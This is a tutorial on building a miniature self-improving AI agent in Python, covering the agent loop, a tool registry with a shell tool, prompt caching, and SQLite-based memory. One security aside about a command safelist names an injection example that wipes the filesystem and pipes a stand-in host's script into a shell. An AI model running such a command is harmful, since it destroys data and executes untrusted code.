A Build-It-Yourself Guide

Build a Mini
Hermes Agent
From Scratch

From Zero to Self-Improving AI Agent in Python
Understand every mechanism by building each one yourself

Contents

Part I: Understanding the Machine
  1. What Hermes Actually Is (And Why You Should Build One)
  2. The Architecture at 10,000 Feet
Part II: The Agent Loop
  1. Your First Agent Loop: Message In, Tool Call Out
  2. The Tool Registry: Teaching Your Agent to Act
  3. Prompt Construction: Assembling the Brain
  4. Prompt Caching: Keeping Costs Under Control
Part III: Memory That Lasts
  1. Session Memory: SQLite + FTS5
  2. Persistent Memory: Who Is This User?
  3. Cross-Session Recall: Finding the Right Memory
Part IV: Skills That Grow
  1. The Skill System: Folders, Progressive Disclosure, and skill_manage
  2. Autonomous Skill Creation
  3. Skill Self-Improvement: The Feedback Loop
Part V: Putting It All Together
  1. The Learning Loop: Nudges, Background Review, and Compression Flush
  2. Context Compression: Staying Within Token Budgets
  3. Building a CLI and Telegram Gateway
  4. What You Built and Where to Go Next
Part I

Understanding the Machine

01 What Hermes Actually Is

Before you write a single line of code, you need to understand what makes Hermes different from every other AI wrapper.

Most AI chat tools are stateless. You open a conversation, do some work, close it. Next time you open one, it starts from scratch. The model has no idea what you did yesterday.

Hermes Agent, built by Nous Research, takes a fundamentally different approach. It is an autonomous, self-improving agent that runs in the background on your own server. Three properties make it distinct:

  1. It remembers across sessions. Three layers of memory (session, persistent, skill) mean it knows what happened last week, who you are, and how to do things it learned from past work.
  2. It improves itself. After completing complex tasks, it offers to save reusable procedures as Skill files (confirming with you first). Background nudges periodically review conversations for things worth remembering. When you give feedback, it updates existing Skills. The more you use it, the better it gets.
  3. It runs without you. Deploy it on a $5 VPS, connect it to Telegram, and it works 24/7. Cron jobs, scheduled tasks, background monitoring. You check in when you want to.

The concept comes from Harness Engineering, a methodology coined by Mitchell Hashimoto (creator of Terraform). His insight: every time an AI makes a mistake, add a rule so it never makes the same mistake again. Over weeks, the AI accumulates enough rules to behave like a veteran team member.

Hashimoto did this manually, editing CLAUDE.md files by hand. Hermes automates the entire process. The agent observes its own performance, curates its own memory, and writes its own rules.

What we are building A miniature of the current Hermes: simplified code that follows the same architecture and design decisions as the real codebase. Where we simplify, each chapter's comparison box shows what the real Hermes does differently. The code compiles and runs; the architecture matches reality; the details are reduced.

What we are NOT building

The real Hermes has 40+ tools, MCP integration, 14 platform gateways, sub-agent delegation, and Honcho user modeling. We skip all of that. Our minimal version focuses on the four mechanisms that make Hermes interesting:

| Mechanism | What it does | Chapter |
|---|---|---|
| Agent Loop | Take user input, call tools, return results | 03-05 |
| Three-Layer Memory | Remember across sessions | 06-08 |
| Skill System | Store and retrieve procedural knowledge | 09-11 |
| Learning Loop | Wire memory + skills into self-improvement | 12 |

By the end, you will understand every component well enough to extend it yourself.

02 The Architecture at 10,000 Feet

Five components, one data flow. This is the entire system.

[Diagram: the main flow runs INPUT (user message) → Prompt Builder (identity + memory + skills + context) → LLM API call → "tool call?" — if yes, Execute Tool (dispatch + return result) and loop back to the LLM; if no, OUTPUT (response to user). Memory (layers 1-2) and Skills (layer 3) feed the Prompt Builder. After the task, a nudge-triggered Background Review runs on a separate thread, saving facts back to memory and creating/patching skills — the learning feedback paths.]

The diagram shows the complete data flow of a single turn. Here is what happens at each stage:

  1. User sends a message. Text comes in from CLI, Telegram, or any other interface.
  2. Prompt Builder assembles the system prompt. It pulls in the agent's identity, relevant memories from the database, matching skill files, and any context files. This assembled prompt is what the LLM actually sees.
  3. LLM generates a response. The response is either a text message (done) or one or more tool calls (continue looping).
  4. Tools execute and results feed back. The tool result is appended to the conversation, and the LLM is called again. This loop repeats until the model produces a final text response.
  5. Retrospective fires. After the task completes, the system evaluates the conversation. Should anything be remembered? Should a new Skill be created? Should an existing Skill be updated? This is the Learning Loop that makes the agent self-improving.

The dashed lines at the bottom are what make Hermes different from a normal chatbot. Those feedback paths close the loop, turning a stateless conversation into a system that accumulates knowledge.

Directory structure of our minimal agent

mini-hermes/
├── agent.py              # Main agent loop
├── prompt_builder.py     # System prompt assembly
├── tool_registry.py      # Tool registration + dispatch
├── tools/
│   ├── terminal.py       # Shell command execution
│   ├── file_tools.py     # Read/write files
│   └── memory_tool.py    # Save/search memory
├── memory/
│   ├── session_db.py     # SQLite + FTS5 session storage
│   ├── persistent.py     # MEMORY.md / USER.md management
│   └── recall.py         # Cross-session search + summarize
├── skills/
│   ├── loader.py         # Discover + parse skill files
│   ├── manager.py        # Create / patch / delete skills
│   └── retrospective.py  # Post-task analysis + skill extraction
├── compression.py        # Context window management
├── cli.py                # Terminal interface
├── config.yaml           # Model + API key + settings
└── data/
    ├── state.db          # SQLite database
    ├── MEMORY.md         # Persistent facts
    ├── USER.md           # User profile
    └── skills/           # Skill markdown files

Everything lives under one directory. Memory, skills, config, database. When you want to migrate, back up this folder. When you want to start fresh, delete it.

Part II

The Agent Loop

03 Your First Agent Loop

A complete agent in under 100 lines. The loop is simple; what you feed into it is what makes it smart.

The core of any LLM agent is the conversation loop. You send messages to an LLM API, the model responds with either text or tool calls, you execute the tools and feed results back, and repeat until the model emits a final text response.

Here is the minimal loop, stripped to its essence:

import json
from openai import OpenAI
from tool_calling import strategy_for_model

class Agent:
    def __init__(self, client, model, system_prompt, tools, tool_handlers):
        self.client = client
        self.model = model
        self.tools = tools                # OpenAI tool schemas
        self.tool_handlers = tool_handlers  # name -> callable
        self._strategy = strategy_for_model(model)  # structured or text
        self.messages = [
            {"role": "system", "content": system_prompt}
        ]

    def run(self, user_input: str) -> str:
        """Send user message, loop through tool calls, return final text."""
        self.messages.append({"role": "user", "content": user_input})

        max_iterations = 15
        for _ in range(max_iterations):
            response = self._call_llm()

            msg = response.choices[0].message

            # Strategy parses the response uniformly
            content, tool_calls = self._strategy.parse_response(msg)

            # Build and append assistant message
            assistant_msg = self._strategy.build_assistant_msg(content, tool_calls)
            self.messages.append(assistant_msg)

            # If no tool calls, we're done
            if not tool_calls:
                return content

            # Execute each tool call
            for tc in tool_calls:
                result = self._execute_tool(tc.name, tc.arguments)

                # Strategy builds the right result message format
                result_msg = self._strategy.build_tool_result_msg(tc, result)
                self.messages.append(result_msg)

        return "[Max iterations reached]"

    def _call_llm(self):
        # Strategy decides whether to pass tools as API param
        # or inject them into the system prompt
        kwargs = {"model": self.model, "messages": self.messages, "max_tokens": 400}
        kwargs = self._strategy.prepare_kwargs(kwargs, self.tools)
        return self.client.chat.completions.create(**kwargs)

    def _execute_tool(self, name: str, args: dict) -> str:
        handler = self.tool_handlers.get(name)
        if not handler:
            return f"Error: unknown tool '{name}'"
        try:
            result = handler(**args)
            return str(result)[:50000]  # Truncate large outputs
        except Exception as e:
            return f"Error executing {name}: {e}"

That is the entire agent loop. Every LLM agent, from Claude Code to Hermes to OpenAI's Codex, is fundamentally this same pattern: call LLM, parse tool calls, execute tools, loop. Notice the loop never touches tool-call formats directly; the _strategy object handles all the format-specific logic. This means the same loop works with both structured (OpenAI-style) and text-based (Gemma, LLaMA) tool calling.

Intuition Think of the agent loop like a chef following a recipe. The LLM is the chef's brain deciding what to do next. Tools are the kitchen equipment. The message list is the chef's working memory of everything done so far. Each "turn" is the chef doing one action (chop onions, check the oven, plate the dish). The loop continues until the chef says "done."

The message list is everything

The self.messages list is the most important data structure in the system. It is the agent's entire working memory for the current session. Every user message, every assistant response, every tool call and result gets appended here.

The OpenAI-compatible message format looks like this:

| Role | Purpose | Key Fields |
|---|---|---|
| system | Agent identity and instructions | content |
| user | Human input | content |
| assistant | Model response | content, tool_calls |
| tool | Result of a tool call | tool_call_id, content |

This format is a de facto standard. It works with OpenAI, Anthropic (via OpenRouter), DeepSeek, and most open-source model APIs. Our minimal agent uses it throughout.
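Concretely, a single tool-using turn produces a transcript like this. The content is hypothetical, but the shapes match the table above; note that in the OpenAI format, `arguments` is a JSON *string*, not a dict:

```python
# One tool-using turn in the OpenAI-compatible message format (illustrative content).
messages = [
    {"role": "system", "content": "You are a helpful agent."},
    {"role": "user", "content": "What files are here?"},
    {
        "role": "assistant",
        "content": None,  # no text yet: the model chose to call a tool
        "tool_calls": [{
            "id": "call_1",
            "type": "function",
            "function": {"name": "terminal", "arguments": '{"command": "ls"}'},
        }],
    },
    # The tool result links back to the call via tool_call_id
    {"role": "tool", "tool_call_id": "call_1", "content": "agent.py\ncli.py"},
    {"role": "assistant", "content": "The directory contains agent.py and cli.py."},
]
```

The agent loop appends each of these in order; the `tool_call_id` linkage is what lets the model match results to the calls it made.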

Why max_iterations matters

Without a cap, a confused model could loop forever, burning tokens. Hermes uses a budget system: each turn costs an iteration, and the agent stops when the budget is exhausted. Our minimal version uses a simple counter of 15 (the max_iterations in the loop above), which is enough for most tasks.

Minimal version vs. real Hermes
This book Simple iteration counter. Synchronous tool execution. Single-model API calls.
Hermes v0.8 IterationBudget class with token tracking. Parallel tool batch detection via _should_parallelize_tool_batch(). Multi-provider support (OpenAI, Anthropic, Codex Responses API). Prompt caching. Reasoning field preservation.
Source: run_agent.py lines 7506-8600 (run_conversation())

Tool-calling strategies: structured vs. text

The loop above assumes the model returns structured tool_calls objects via the API. But many open models (Gemma, LLaMA, Phi) emit tool calls as text in the response body instead. Rather than a brittle fallback parser, we solve this with a strategy pattern: the agent delegates three decisions to a swappable strategy object:

| Decision | StructuredStrategy | TextStrategy |
|---|---|---|
| How tools are presented | Pass tools API parameter | Inject tool descriptions into system prompt |
| How tool calls are parsed | Read msg.tool_calls | Regex-parse text content |
| How results are fed back | role: "tool" with tool_call_id | role: "user" with [Tool Result: name] prefix |

The strategy is selected automatically based on the model name:

from tool_calling import ToolCallingStrategy, strategy_for_model

class Agent:
    def __init__(self, client, model, ...):
        self._strategy = strategy_for_model(model)  # picks based on model name

    def run(self, user_input):
        ...
        for _ in range(max_iterations):
            response = self._call_llm()
            msg = response.choices[0].message

            # Strategy handles parsing uniformly
            content, tool_calls = self._strategy.parse_response(msg)
            assistant_msg = self._strategy.build_assistant_msg(content, tool_calls)
            self.messages.append(assistant_msg)

            if not tool_calls:
                return content

            for tc in tool_calls:
                result = self._execute_tool(tc.name, tc.arguments)
                # Strategy builds the right message format
                result_msg = self._strategy.build_tool_result_msg(tc, result)
                self.messages.append(result_msg)

The text strategy parses several common formats that local models produce:

# Format 1: XML-style tags (Gemma, ChatML)
<tool_call>{"name": "terminal", "arguments": {"command": "ls"}}</tool_call>

# Format 2: call:name{json} (some Gemma variants)
call:terminal{command: "ls -la"}

# Format 3: Fenced JSON blocks
```json
{"name": "file_write", "arguments": {"path": "out.txt", "content": "hello"}}
```

When you switch models via /model in the CLI, the strategy updates automatically. This means you can chat with a structured model like Qwen, switch to Gemma mid-session, and tool calling keeps working.
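As a sketch of what the text strategy's parsing looks like, here is a minimal parser for Format 1 only. The function name and structure are illustrative, not the book's actual TextStrategy:

```python
import json
import re

# Matches Format 1: <tool_call>{...}</tool_call> (Gemma / ChatML style)
TOOL_CALL_RE = re.compile(r"<tool_call>\s*(\{.*?\})\s*</tool_call>", re.DOTALL)

def parse_text_tool_calls(text: str) -> list[tuple[str, dict]]:
    """Extract (name, arguments) pairs from XML-style tool-call tags."""
    calls = []
    for match in TOOL_CALL_RE.finditer(text):
        try:
            payload = json.loads(match.group(1))
            calls.append((payload["name"], payload.get("arguments", {})))
        except (json.JSONDecodeError, KeyError):
            continue  # malformed call: treat it as plain text
    return calls
```

A real implementation would add patterns for Formats 2 and 3 and fall back to returning the text unmodified when nothing parses.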

Key design point The strategy pattern keeps the agent loop itself clean: it never has to know how tool calls arrive. Adding support for a new model format means adding a regex pattern to TextStrategy, not touching the agent loop.

04 The Tool Registry

Tools turn your agent from a chatbot into something that can actually do things.

An agent without tools is just a chatbot. The tool registry is the mechanism that lets you define what actions the agent can take, expose them to the LLM in the right format, and dispatch calls to the right handler.

The registry pattern

from dataclasses import dataclass, field
from typing import Callable, Any

@dataclass
class ToolEntry:
    name: str
    description: str
    parameters: dict        # JSON Schema for the function args
    handler: Callable
    category: str = "general"

class ToolRegistry:
    def __init__(self):
        self._tools: dict[str, ToolEntry] = {}

    def register(self, name, description, parameters, handler, category="general"):
        self._tools[name] = ToolEntry(
            name=name,
            description=description,
            parameters=parameters,
            handler=handler,
            category=category,
        )

    def get_schemas(self, categories=None) -> list[dict]:
        """Return OpenAI-compatible tool schemas."""
        tools = self._tools.values()
        if categories:
            tools = [t for t in tools if t.category in categories]
        return [
            {
                "type": "function",
                "function": {
                    "name": t.name,
                    "description": t.description,
                    "parameters": t.parameters,
                },
            }
            for t in tools
        ]

    def execute(self, name: str, args: dict) -> str:
        entry = self._tools.get(name)
        if not entry:
            raise ValueError(f"Unknown tool: {name}")
        return str(entry.handler(**args))

# Global registry instance
registry = ToolRegistry()

Registering tools

Each tool is a Python function with a JSON Schema describing its parameters. Here is a minimal terminal tool:

import subprocess
from tool_registry import registry

def run_terminal(command: str, timeout: int = 30) -> str:
    """Execute a shell command and return stdout + stderr."""
    try:
        result = subprocess.run(
            command, shell=True, capture_output=True,
            text=True, timeout=timeout
        )
        output = result.stdout + result.stderr
        return output.strip() or "(no output)"
    except subprocess.TimeoutExpired:
        return "Error: command timed out"

registry.register(
    name="terminal",
    description="Run a shell command. Use for git, file ops, builds, etc.",
    parameters={
        "type": "object",
        "properties": {
            "command": {"type": "string", "description": "Shell command to execute"},
            "timeout": {"type": "integer", "description": "Timeout in seconds", "default": 30},
        },
        "required": ["command"],
    },
    handler=run_terminal,
    category="execution",
)
Security Running shell commands from an LLM is dangerous. The real Hermes has a Docker-based sandbox with a read-only filesystem, dropped Linux capabilities, and namespace isolation. For our minimal version, be careful what you let the agent do. Consider restricting commands to a safelist for production use.
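One way to implement that safelist, sketched under the assumption that a fixed set of binaries is enough. The allowed commands here are examples, and note this version deliberately uses shell=False, unlike the chapter's run_terminal, so pipes and redirects are unavailable:

```python
import shlex
import subprocess

ALLOWED_COMMANDS = {"ls", "cat", "echo", "git", "grep"}  # example safelist

def run_terminal_safe(command: str, timeout: int = 30) -> str:
    """Reject any command whose first word is not on the safelist."""
    parts = shlex.split(command)
    if not parts or parts[0] not in ALLOWED_COMMANDS:
        return f"Error: command not on safelist: {parts[0] if parts else '(empty)'}"
    # shell=False: no pipes, redirects, or substitutions can sneak through
    result = subprocess.run(parts, capture_output=True, text=True, timeout=timeout)
    return (result.stdout + result.stderr).strip() or "(no output)"
```

The trade-off is real: shell=False blocks `rm -rf / ; curl evil.sh | sh` style injection, but it also blocks legitimate pipelines the agent might want, so you choose per deployment.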

Toolsets: controlling what the agent can access

Minimal version vs. real Hermes
This book Dict-based registry. Flat category strings. Manual tool discovery.
Hermes v0.8 ToolRegistry singleton with lazy module imports, check_fn for availability gates, max_result_size truncation, and composable toolsets that can include other toolsets. MCP tools auto-discovered at startup. 40+ built-in tools across 5 categories.
Source: tools/registry.py, model_tools.py, toolsets.py

Hermes groups tools into toolsets (categories like "web", "terminal", "file", "memory"). You enable or disable entire toolsets in the config. This matters for two reasons:

Fewer tools = better decisions. An LLM with 100 tools available makes worse tool-selection choices than one with 10. Only expose what the task needs.

Toolsets are security boundaries. A research sub-agent should have web access but not terminal access. A coding sub-agent needs terminal but not web. The category field on each tool entry makes this filtering trivial.
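The filtering itself is trivial once tools carry a category. A toy version with illustrative tool names and categories:

```python
# Illustrative tool table; in the real registry each entry also carries
# a description, JSON Schema, and handler.
TOOLS = [
    {"name": "web_search",  "category": "web"},
    {"name": "terminal",    "category": "execution"},
    {"name": "file_write",  "category": "file"},
    {"name": "memory_save", "category": "memory"},
]

def toolset(categories: set[str]) -> list[str]:
    """Expose only the tools a given (sub-)agent should see."""
    return [t["name"] for t in TOOLS if t["category"] in categories]

research_agent_tools = toolset({"web", "memory"})       # no terminal access
coding_agent_tools = toolset({"execution", "file"})     # no web access
```

This is the same filter `get_schemas(categories=...)` performs in the chapter's ToolRegistry; the boundary is only as strong as your discipline in categorizing tools.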

05 Prompt Construction

The system prompt is the single biggest lever you have. It determines what kind of agent you get.

In Hermes, the system prompt is built once per session and then frozen. It is not reassembled on every turn. This frozen snapshot is reused across all API calls in the session, which is critical for prompt caching (Chapter 6). The prompt is only rebuilt after context compression events.

class PromptBuilder:
    def build(self, memory_block: str, skills_index: str, user_context: str) -> str:
        sections = []

        # 1. Core identity
        sections.append(self.IDENTITY)

        # 2. Persistent memory (who is this user, what do I know)
        if memory_block:
            sections.append(f"## What I Remember\n{memory_block}")

        # 3. Available skills (what procedures do I know)
        if skills_index:
            sections.append(f"## Available Skills\n{skills_index}")

        # 4. User context files (project-specific info)
        if user_context:
            sections.append(f"## Project Context\n{user_context}")

        # 5. Behavioral guidance
        sections.append(self.MEMORY_GUIDANCE)
        sections.append(self.SKILLS_GUIDANCE)
        sections.append(self.TOOL_USE_GUIDANCE)

        return "\n\n".join(sections)

    IDENTITY = """You are a helpful AI assistant with persistent memory \
and self-improving skills. You remember past conversations and learn \
from experience. Use your tools to accomplish tasks."""

    MEMORY_GUIDANCE = """## Memory Instructions
After completing tasks, actively decide what's worth remembering:
- User preferences and habits
- Project context and architecture decisions
- Solutions to problems that might recur
Use the memory tool to persist important observations."""

    SKILLS_GUIDANCE = """## Skill Instructions
After difficult or iterative tasks, offer to save as a skill. \
Confirm with the user before creating or deleting. Use the \
skill_manage tool with action="create" for new skills, \
action="patch" (old_string/new_string) to fix existing ones.
Skip for simple one-offs."""

    TOOL_USE_GUIDANCE = """## Tool Use
Take action. Don't just describe what you would do - actually do it. \
If the user asks you to write code, write the file. If they ask you \
to run something, run it. Prefer action over explanation."""

The real Hermes has extensive prompt sections. The three guidance blocks above are the critical ones that drive the self-improvement behavior:

| Guidance | What it steers |
|---|---|
| MEMORY_GUIDANCE | Tells the agent when and what to save to persistent memory |
| SKILLS_GUIDANCE | Tells the agent to offer saving reusable procedures, confirm before creating |
| TOOL_USE_GUIDANCE | Prevents the agent from just planning without acting |
Key insight The self-improvement behavior is not magic. It is steered by prompt instructions and background nudges. The agent offers to save skills (and confirms with the user), and the nudge system periodically reviews conversations in the background. The LLM's instruction-following capability does the rest.
Minimal version vs. real Hermes
This book Frozen snapshot: build once at session start from identity + memory + skills index + guidance. Not rebuilt per turn.
Hermes v0.8 Frozen per session, only rebuilt after compression. Cached on _cached_system_prompt. Continuing sessions load the stored prompt from session DB instead of rebuilding (preserves Anthropic prefix cache). Whitespace normalization for KV-cache consistency. Skill body injection. Tool-use enforcement guidance.
Source: agent/prompt_builder.py

Frozen snapshot vs. per-turn injection

There are two paths for memory to reach the LLM:

| Source | Where it goes | When it updates |
|---|---|---|
| Built-in memory (MEMORY.md, USER.md) | System prompt (frozen snapshot) | Once per session; only rebuilt after compression |
| External memory providers (Honcho, etc.) | Injected into user message per turn | Every turn via prefetch_all() |
The built-in memory is a frozen snapshot: it is read from disk when the session starts and baked into the system prompt. Even if the agent writes new observations during the session (via the memory tool), those writes go to disk but do not appear in the system prompt until the next session (or after compression rebuilds it). This is a deliberate choice for prompt caching stability.

External memory providers can inject per-turn context into the user message, but this is optional and only applies if a provider like Honcho is configured.

For our minimal build, the simple approach works: load MEMORY.md at session start, bake it into the system prompt, do not touch it again until the session ends.

06 Prompt Caching

Every token you re-send costs money. Prompt caching is how Hermes keeps multi-turn conversations affordable.

In a 20-turn conversation, the system prompt (identity + memory + skills) is sent with every API call. Without caching, you pay for those tokens 20 times. Anthropic's prompt caching lets you mark message boundaries as cache breakpoints. Cached prefixes cost ~90% less on subsequent requests.

Hermes implements a strategy called system_and_3: it places cache breakpoints on the system prompt (stable across all turns) plus the last 3 non-system messages (a rolling window). Anthropic allows a maximum of 4 breakpoints, so this uses all of them.

import copy

def apply_prompt_caching(messages, cache_ttl="5m"):
    """Apply system_and_3 caching: system prompt + last 3 messages."""
    messages = copy.deepcopy(messages)
    marker = {"type": "ephemeral"}

    breakpoints_used = 0

    # 1. Cache the system prompt (stable across all turns)
    if messages[0].get("role") == "system":
        _mark_message(messages[0], marker)
        breakpoints_used += 1

    # 2-4. Cache the last 3 non-system messages (rolling window)
    remaining = 4 - breakpoints_used
    non_sys = [i for i in range(len(messages))
               if messages[i].get("role") != "system"]
    for idx in non_sys[-remaining:]:
        _mark_message(messages[idx], marker)

    return messages

def _mark_message(msg, marker):
    """Add cache_control to a message, handling string and list content."""
    content = msg.get("content")
    if isinstance(content, str):
        # Convert to content block format for cache_control
        msg["content"] = [
            {"type": "text", "text": content, "cache_control": marker}
        ]
    elif isinstance(content, list) and content:
        content[-1]["cache_control"] = marker
    else:
        msg["cache_control"] = marker

Why this constrains the architecture

Prompt caching is not just an optimization. It constrains how you build the system prompt:

| Design constraint | Why it matters for caching |
|---|---|
| System prompt must be stable | If it changes every turn, the cache is invalidated and you pay full price. Memory and skills content must stay constant within a session. |
| Whitespace must be normalized | Even a trailing space change invalidates the cache. Hermes normalizes whitespace before every API call for KV-cache consistency. |
| Ephemeral context goes in user messages | Prefetched memories are injected into the user message, not the system prompt, because user messages rotate out of the cache window naturally. |
| Deep copy before marking | Cache markers modify the message structure (string to content-block array). The original messages must be preserved for session persistence. |
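The whitespace constraint is worth making concrete. A minimal normalizer in the spirit of what the table describes; the actual rules Hermes applies may differ:

```python
def normalize_for_cache(text: str) -> str:
    """Strip trailing whitespace per line and any trailing newlines so the
    cached prefix stays byte-identical across turns (sketch of the idea)."""
    lines = [line.rstrip() for line in text.split("\n")]
    return "\n".join(lines).rstrip("\n")
```

Run this over the system prompt before every API call; since the function is idempotent, re-normalizing an already-normalized prompt produces the exact same bytes and the cache hit survives.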
Intuition Think of it like a restaurant menu. The menu (system prompt) stays the same for every customer. The order (user messages) changes. You print the menu once and reuse it; you write each order fresh. If you changed the menu every meal, you would waste time reprinting it. Same with tokens: keep the stable parts stable, and only pay to transmit what changes.
Minimal version vs. real Hermes
This book Basic system_and_3 strategy. Single TTL. Works with OpenRouter Anthropic models.
Hermes v0.8 Supports both 5m and 1h TTL. Native Anthropic adapter for direct API calls (different cache_control placement). Provider detection to skip caching for non-Anthropic models. Applied in _prepare_api_messages() just before the API call.
Source: agent/prompt_caching.py, agent/anthropic_adapter.py
Part III

Memory That Lasts

07 Session Memory: SQLite + FTS5

Every conversation gets recorded with full-text search. This is the agent's episodic memory.

Session memory answers the question: what happened? It records every conversation turn in a SQLite database with FTS5 full-text indexing. Think of it as the agent's conversation diary.

Why SQLite + FTS5

Most AI tools either forget everything (stateless) or dump everything into the context window (expensive and slow). Hermes uses on-demand retrieval: store everything, search when needed, inject only what is relevant.

| Approach | Load Everything | On-Demand (Hermes) |
|---|---|---|
| Context usage | Grows linearly | Essentially constant |
| Precision | Everything is there but nothing is findable | Keyword matching, precise |
| Long-term viability | Breaks after a few days | Works for months |
| Response speed | Slows over time | Stays the same |

FTS5 is SQLite's built-in full-text search extension. No extra database to install. All data lives in a local file. No network dependency, no privacy concerns.

The schema

import sqlite3
import uuid
from datetime import datetime

class SessionDB:
    def __init__(self, db_path: str):
        self.db_path = db_path
        self.conn = sqlite3.connect(db_path)
        self.conn.execute("PRAGMA journal_mode=WAL")  # Concurrent reads
        self._create_tables()

    def _create_tables(self):
        self.conn.executescript("""
            CREATE TABLE IF NOT EXISTS sessions (
                id TEXT PRIMARY KEY,
                source TEXT DEFAULT 'cli',
                started_at REAL,
                ended_at REAL,
                message_count INTEGER DEFAULT 0,
                summary TEXT
            );

            CREATE TABLE IF NOT EXISTS messages (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                session_id TEXT REFERENCES sessions(id),
                role TEXT NOT NULL,
                content TEXT,
                tool_name TEXT,
                tool_call_id TEXT,
                timestamp REAL
            );

            CREATE VIRTUAL TABLE IF NOT EXISTS messages_fts
            USING fts5(content, content_rowid='id');
        """)
        self.conn.commit()

    def create_session(self, source="cli") -> str:
        session_id = str(uuid.uuid4())
        self.conn.execute(
            "INSERT INTO sessions (id, source, started_at) VALUES (?, ?, ?)",
            (session_id, source, datetime.now().timestamp())
        )
        self.conn.commit()
        return session_id

    def append_message(self, session_id, role, content,
                        tool_name=None, tool_call_id=None):
        cursor = self.conn.execute(
            """INSERT INTO messages
               (session_id, role, content, tool_name, tool_call_id, timestamp)
               VALUES (?, ?, ?, ?, ?, ?)""",
            (session_id, role, content, tool_name, tool_call_id,
             datetime.now().timestamp())
        )
        # Index in FTS5 (only user and assistant messages)
        if role in ("user", "assistant") and content:
            self.conn.execute(
                "INSERT INTO messages_fts (rowid, content) VALUES (?, ?)",
                (cursor.lastrowid, content)
            )
        self.conn.commit()

    def search(self, query: str, limit: int = 20) -> list[dict]:
        """Full-text search across all sessions."""
        sanitized = self._sanitize_fts_query(query)
        rows = self.conn.execute("""
            SELECT m.session_id, m.role,
                   snippet(messages_fts, 0, '>>>', '<<<', '...', 40) as snippet,
                   s.source, s.started_at
            FROM messages_fts
            JOIN messages m ON m.id = messages_fts.rowid
            JOIN sessions s ON s.id = m.session_id
            WHERE messages_fts MATCH ?
            ORDER BY rank
            LIMIT ?
        """, (sanitized, limit)).fetchall()
        return [
            {"session_id": r[0], "role": r[1], "snippet": r[2],
             "source": r[3], "date": datetime.fromtimestamp(r[4]).isoformat()}
            for r in rows
        ]

    def _sanitize_fts_query(self, query: str) -> str:
        """Clean user input for FTS5 safety."""
        # Remove special FTS5 operators that could cause errors
        for char in ['"', '*', '+', '-', '(', ')', ':']:
            query = query.replace(char, ' ')
        # Split into words, wrap each as a prefix match
        words = [w.strip() for w in query.split() if w.strip()]
        return ' '.join(words) if words else '""'

Two important implementation details:

WAL mode (PRAGMA journal_mode=WAL) enables concurrent readers with a single writer. This matters when the gateway process is handling messages from multiple platforms while the agent is also writing to the database.

FTS5 query sanitization is essential. User queries can contain special characters that break FTS5 syntax. The sanitizer strips operators and treats input as plain keyword search.
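You can verify the FTS5 machinery in isolation with an in-memory database (table name and contents are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE VIRTUAL TABLE notes USING fts5(content)")
conn.executemany(
    "INSERT INTO notes (content) VALUES (?)",
    [
        ("Deployed the Telegram gateway on the VPS",),
        ("Fixed the sanitizer for quoted FTS5 queries",),
    ],
)
# snippet(table, column_index, start_marker, end_marker, ellipsis, max_tokens)
hits = conn.execute(
    "SELECT snippet(notes, 0, '>>>', '<<<', '...', 8) "
    "FROM notes WHERE notes MATCH ? ORDER BY rank",
    ("telegram",),
).fetchall()
```

Note that MATCH is case-insensitive for ASCII with the default tokenizer, and snippet() wraps the matched tokens in whatever markers you choose — the same call SessionDB.search uses above.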

Intuition Session memory is like a diary with an index. You write everything down, but you do not re-read the entire diary every morning. You look up specific entries when you need them. The FTS5 index is that lookup mechanism.
Minimal version vs. real Hermes
This book Single-threaded writes. Basic FTS5 MATCH queries. Inline search function.
Hermes v0.8 WAL mode with application-level jitter retry (20-150ms) for write contention via _execute_write(). Stores tool_calls, reasoning fields, and Codex reasoning items. Session metadata tracks token counts, estimated cost, and parent session IDs for sub-agent continuations.
Source: hermes_state.py (SessionDB class, ~1239 lines)

08 Persistent Memory

Session memory records what happened. Persistent memory records who you are and what matters.

Persistent memory answers the question: who is this user? It stores durable facts distilled from conversations: coding preferences, commonly used tools, project context, work habits. These persist across sessions and are loaded at startup.

In Hermes, this is implemented as two simple markdown files: MEMORY.md, which accumulates observations distilled from conversations, and USER.md, which holds the user profile.

Both files are loaded as a frozen snapshot when a session starts and baked into the system prompt. Writes during the session go to disk but do not update the running prompt until the next session or until context compression rebuilds it. This is critical for prompt caching (see Chapter 6).

from pathlib import Path

class PersistentMemory:
    MEMORY_LIMIT = 2200   # Hermes default for observations
    USER_LIMIT = 1375     # Hermes default for user profile

    def __init__(self, data_dir: Path):
        self.memory_path = data_dir / "MEMORY.md"
        self.user_path = data_dir / "USER.md"
        # Create files if they don't exist
        self.memory_path.touch(exist_ok=True)
        self.user_path.touch(exist_ok=True)

    def load(self) -> str:
        """Load both files as a combined context block."""
        parts = []
        memory = self.memory_path.read_text().strip()
        user = self.user_path.read_text().strip()
        if user:
            parts.append(f"### User Profile\n{user}")
        if memory:
            parts.append(f"### Observations\n{memory}")
        return "\n\n".join(parts)

    def save_observation(self, text: str):
        """Append an observation, respecting the size limit."""
        current = self.memory_path.read_text()
        new_entry = f"\n- {text}"
        if len(current) + len(new_entry) > self.MEMORY_LIMIT:
            lines = current.strip().split("\n")
            while lines and len("\n".join(lines)) + len(new_entry) > self.MEMORY_LIMIT:
                lines.pop(0)
            current = "\n".join(lines)
        self.memory_path.write_text(current + new_entry)

    def update_user_profile(self, text: str):
        """Replace the user profile."""
        self.user_path.write_text(text[:self.USER_LIMIT])

The size limits (2,200 for memory, 1,375 for user profile) are deliberate. This content is frozen into the system prompt at session start, so it consumes tokens on every API call. The combined ~3,575 characters keeps the overhead predictable while still being useful.
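
The eviction behavior is easier to see in isolation. This standalone helper mirrors the logic of save_observation above (same algorithm, extracted for illustration):

```python
def evict_and_append(current: str, observation: str, limit: int) -> str:
    """Drop the oldest lines until the new entry fits within limit."""
    new_entry = f"\n- {observation}"
    if len(current) + len(new_entry) <= limit:
        return current + new_entry
    lines = current.strip().split("\n")
    # Oldest-first eviction: pop from the top until the new entry fits
    while lines and len("\n".join(lines)) + len(new_entry) > limit:
        lines.pop(0)
    return "\n".join(lines) + new_entry

memory = "- likes dark mode\n- uses zsh"
memory = evict_and_append(memory, "prefers pytest", limit=2200)
```

Because eviction is purely positional, the most recently saved observations always survive; there is no notion of importance, which is exactly the memory-pollution limitation noted above.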

What belongs in persistent memory

Save:
- User preferences (code style, editor, OS)
- Project context (tech stack, architecture decisions)
- Recurring patterns (preferred error handling approach)
- Validated solutions (what worked)

Do NOT save:
- One-off task details
- Outdated API version numbers
- Sensitive data (passwords, keys)
- Wrong inferences (should be corrected, not stored)
